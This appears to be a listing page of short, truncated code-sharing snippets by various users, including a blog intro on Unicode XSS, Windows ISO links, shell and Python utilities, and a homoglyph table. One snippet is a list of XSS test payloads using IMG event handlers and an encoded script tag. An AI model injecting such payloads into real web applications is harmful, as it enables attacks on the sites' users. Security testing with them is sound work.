paj28

Unicode XSS via Combining Characters

Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.

Recap of Unicode XSS

Lab: https://4t64ubva.xssy.uk/

A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:

vinhjaxt

https://web.archive.org/web/20220308212352/https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2016/

Windows 2012 R2 Essentials: http://download.microsoft.com/download/8/F/7/8F7024D2-AB2A-4BE2-8406-1E3AC49C5C1F/9600.16384.WINBLUE_RTM.130821-1623_X64FRE_SERVER_SOLUTION_EN-US-IRM_SSSO_X64FRE_EN-US_DV5.ISO

Windows 2012 R2: http://download.microsoft.com/download/6/2/A/62A76ABB-9990-4EFC-A4FE-C7D698DAEB96/9600.17050.WINBLUE_REFRESH.140317-1640_X64FRE_SERVER_EVAL_EN-US-IR3_SSS_X64FREE_EN-US_DV9.ISO

Windows 2016: https://software-download.microsoft.com/download/pr/Windows_Server_2016_Datacenter_EVAL_en-us_14393_refresh.ISO

Windows 2019 Essentials: https://software-download.microsoft.com/download/pr/17763.737.190906-2324.rs5_release_svc_refresh_SERVERESSENTIALS_OEM_x64FRE_en-us_1.iso

julianandrews

# Depends on: msmtp, libsecret-tools
#
# Set password:
# secret-tool store --label="msmtp password for jandrews271@gmail.com" service msmtp username jandrews271@gmail.com
#
# Send mail:
# echo "Message Body" | send-gmail myusername recipient@exmaple.com "My Subject"
send-gmail() {
  local user="$1"
  local to="$2"

Hakky54

OpenSSL 🔐

Install

Install the OpenSSL on Debian based systems

sudo apt-get install openssl

StevenACoffman

Unicode Character Look-Alikes

Original Letter	Look-Alike(s)
a	а ạ ą ä à á ą
c	с ƈ ċ
d	ԁ ɗ
e	е ẹ ė é è
g	ġ
h	һ

melvinsh

application/atom+xml
application/json
application/json
application/json
application/ld+json
application/rss+xml
application/vnd.geo+json
application/xml
application/xml
application/javascript

arjunv

{
    "key_events": {
        "key_unknown": "adb shell input keyevent 0",
        "key_soft_left": "adb shell input keyevent 1",
        "key_soft_right": "adb shell input keyevent 2",
        "key_home": "adb shell input keyevent 3",
        "key_back": "adb shell input keyevent 4",
        "key_call": "adb shell input keyevent 5",
        "key_endcall": "adb shell input keyevent 6",
        "key_0": "adb shell input keyevent 7",

JonathonReinhart

#!/usr/bin/env python3
from __future__ import print_function
from tempfile import TemporaryFile
from binascii import hexlify

from ctypes import *

class StructHelper(object):
    def __get_value_str(self, name, fmt='{}'):
        val = getattr(self, name)

kurobeats

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">

amdei

#!/usr/bin/env python

"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""


__version__ = "0.1"
__all__ = ["SimpleHTTPRequestHandler"]